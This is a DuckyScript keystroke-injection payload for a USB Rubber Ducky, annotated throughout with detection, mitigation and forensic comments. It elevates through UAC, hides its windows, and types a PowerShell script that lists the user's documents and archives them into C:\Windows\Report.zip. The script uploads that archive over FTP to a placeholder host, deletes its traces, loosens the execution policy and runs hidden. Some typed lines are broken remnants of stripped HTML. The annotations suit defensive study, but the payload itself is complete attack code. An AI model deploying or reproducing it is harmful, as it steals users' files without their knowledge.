REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Exfiltrates documents and uploads them to an FTP server.
REM Version: 1.0
REM Category: Exfiltration
REM Stage 1: open an elevated Notepad through the Run dialog (GUI r = Win+R).
REM Every step is paced by fixed DELAYs (milliseconds); nothing verifies that the previous step succeeded.
DELAY 800
GUI r
DELAY 1000
REM Start-Process -Verb runAs requests elevation, so a UAC prompt is expected after this line.
REM Detection: process-creation logging with command lines (Security event 4688 or Sysmon event 1) shows powershell.exe started with "Start-Process notepad -Verb runAs".
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 800
REM ALT y presumably answers "Yes" on the UAC consent prompt (English UI assumed - confirm).
REM Mitigation: the chain depends on the logged-on user being an administrator whose UAC prompt asks for consent only; a standard user or a credential prompt stops it here.
ALT y
DELAY 800
ENTER
REM ALT SPACE, m, DOWNARROW x100, ENTER: window system menu > Move, then shift the window downward - presumably to push it out of the user's view.
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
REM Stage 2: PowerShell source typed line by line into the Notepad window; none of it executes until the saved file is run later.
REM Builds a staging folder named "Ducky Report <d-M-y HHmmss>" under %USERPROFILE%. A folder with that name prefix is a host artifact to search for.
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = ""
ENTER
REM Writes an HTML page titled 'Recon Report' to ComputerInfo.html inside the staging folder.
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
REM NOTE(review): the bare lines following the next two STRING commands are not DuckyScript commands; they look like remnants of HTML markup stripped from the payload - confirm against the upstream file.
STRING $Report = $Report + "
Duck Tool Kit Report
Generated on: $Date
"
ENTER
STRING $Report = $Report + '
User Documents (doc,docx,pdf,rar)
'
ENTER
REM Recursively lists *.doc, *.docx, *.pdf, *.zip and *.rar under $userDir as an HTML table of Directory, Name and LastAccessTime.
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER
STRING $Report = $Report + ''
ENTER
REM Appends the assembled report text to ComputerInfo.html.
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
REM Stage 3: typed PowerShell function copy-ToZip, which packs the staging folder into C:\Windows\Report.zip.
REM Detection: a .zip created directly under C:\Windows by powershell.exe is unusual and worth a file-creation alert.
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
REM Seeds the file with "PK" + bytes 5 and 6 + 18 zero bytes, i.e. the end-of-central-directory record of an empty ZIP archive.
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
REM Uses the Shell.Application COM object to treat the zip as a folder and copy each staged item into it.
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
REM Polls once per second until the copied item is visible in the archive; the loop has no timeout.
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
REM Stage 4: upload of the archive, followed by cleanup.
REM $ftpAddr holds placeholder credentials and host inside the URL. FTP is unencrypted, so the credentials and the archive are readable in a packet capture.
REM Detection / mitigation: outbound FTP initiated by powershell.exe (System.Net.WebClient.UploadFile); blocking outbound FTP from workstations at the egress firewall stops this stage.
STRING $final = 'C:\Windows\Report.zip'
ENTER
STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip"
ENTER
STRING $browser = New-Object System.Net.WebClient
ENTER
STRING $url = New-Object System.Uri($ftpAddr)
ENTER
STRING $browser.UploadFile($url, $final)
ENTER
REM Removes the staging folder, the archive and the script file itself ($MyInvocation.InvocationName).
REM Forensics: little remains on disk after a run, so process-creation, script-block and network logs are the main evidence sources.
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
REM Stage 5: save the typed text from Notepad as C:\Windows\config-58477.ps1, then close Notepad with ALT F4.
REM Writing into C:\Windows needs administrator rights, which is presumably why Notepad was started elevated.
REM Detection: notepad.exe creating a .ps1 file under C:\Windows; the file name is fixed in this payload and usable as an indicator.
CTRL s
DELAY 800
STRING C:\Windows\config-58477.ps1
ENTER
DELAY 1000
ALT F4
REM Stage 6: open an elevated cmd through the Run dialog and execute the saved script.
DELAY 800
GUI r
DELAY 800
REM Second elevation request; ALT y again presumably accepts the UAC consent prompt (English UI assumed - confirm).
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 1000
REM Shrinks the console to 14 columns by 1 line, then moves it with the same system-menu Move sequence used for Notepad - presumably to keep it out of sight.
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 800
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
REM Sets the PowerShell execution policy to Unrestricted for the current user. The payload never restores it, so the leftover setting is an indicator and should be reset during remediation.
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 800
REM Runs the saved script with a hidden window.
REM Detection: powershell.exe with "-windowstyle hidden -File" pointing into C:\Windows; PowerShell Script Block Logging (event 4104) records the script text even though the script deletes its own file.
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
ENTER